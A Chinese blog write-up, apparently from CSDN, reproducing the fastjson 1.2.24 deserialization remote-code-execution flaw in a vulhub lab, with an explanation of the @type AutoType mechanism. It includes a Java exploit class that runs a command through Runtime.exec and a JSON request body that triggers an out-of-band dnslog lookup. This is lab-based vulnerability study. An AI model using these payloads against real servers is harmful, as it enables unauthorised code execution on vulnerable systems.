fastjson(版本<=1.2.24)复现

1.啥是JSON介绍:

JSON,全称:JavaScript Object Notation,作为一个常见的轻量级的数据交换格式,应该在一个程序员的开发生涯中是常接触的。简洁和清晰的层次结构使得 JSON 成为理想的数据交换语言。 易于人阅读和编写,同时也易于机器解析和生成,并有效地提升网络传输效率。
即JavaScript对象标记法,使用键值对进行信息的存储。举个简单的例子如下:

{
        "name":"hang",

        "age":19,

        "media":["CSDN","bilibili","Github"]
}
json本质就是一种字符串,用于信息的存储和交换。

2.啥是fastjson?

fastjson 是一个 有阿里开发的一个开源Java 类库,可以将 Java 对象转换为 JSON 格式(序列化),当然它也可以将 JSON 字符串转换为 Java 对象(反序列化)。

3.fastjson序列化/反序列化原理

fastjson的漏洞本质还是一个java的反序列化漏洞,由于引进了AutoType功能,fastjson在对json字符串反序列化的时候,会读取到@type的内容,将json内容反序列化为java对象并调用这个类的setter方法。

4.fastjson反序列化漏洞原理

使用AutoType功能进行序列号的JSON字符会带有一个@type来标记其字符的原始类型,在反序列化的时候会读取这个@type,来试图把JSON内容反序列化到对象,并且会调用这个库的setter或者getter方法,然而,@type的类有可能被恶意构造,只需要合理构造一个JSON,使用@type指定一个想要的攻击类库就可以实现攻击。

$复现流程:

漏洞影响范围:fastjson<=1.2.24

下面仅作漏洞复现记录与实现,利用流程如下:

一、漏洞环境搭建

本文漏洞环境采用vulhub搭建,执行以下命令开启环境

cd /vulhub/fastjson/1.2.24-rce/
docker-compose up -d

执行完毕后访问8090端口,访问如下:请添加图片描述

二、漏洞验证方法一

首先将exp进行编译,将以下内容保存为TouchFile.java

import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
  static {
      try {
          Runtime rt = Runtime.getRuntime();
          String[] commands = {"ping", "test.3ztjrz.dnslog.cn"};
          Process pc = rt.exec(commands);
          pc.waitFor();
      } catch (Exception e) {
          // do nothing
      }
  }
}

在这里插入图片描述

三、漏洞验证方法二

先用dnslog外带方式验证一下漏洞存不存在
dnslog地址
DNSLog PlatformDNSLog平台 http://www.dnslog.cn/

在这里插入图片描述

修改数据包
请求方式GET改成POST
加上Content-Type:application/json 请求头字段
加请求体数据,内容如下

{
	"a":{
	"@type":"java.net.Inet4Address",
	"val":"申请的域名"
	}
}

在这里插入图片描述

再刷新dnslog页面,查看有无变化
发现有记录了,能收到靶场发来的内容,说明存漏洞
在这里插入图片描述

关闭靶场docker stop id

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

kui954

感谢各位的支持o(* ̄3 ̄)o

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值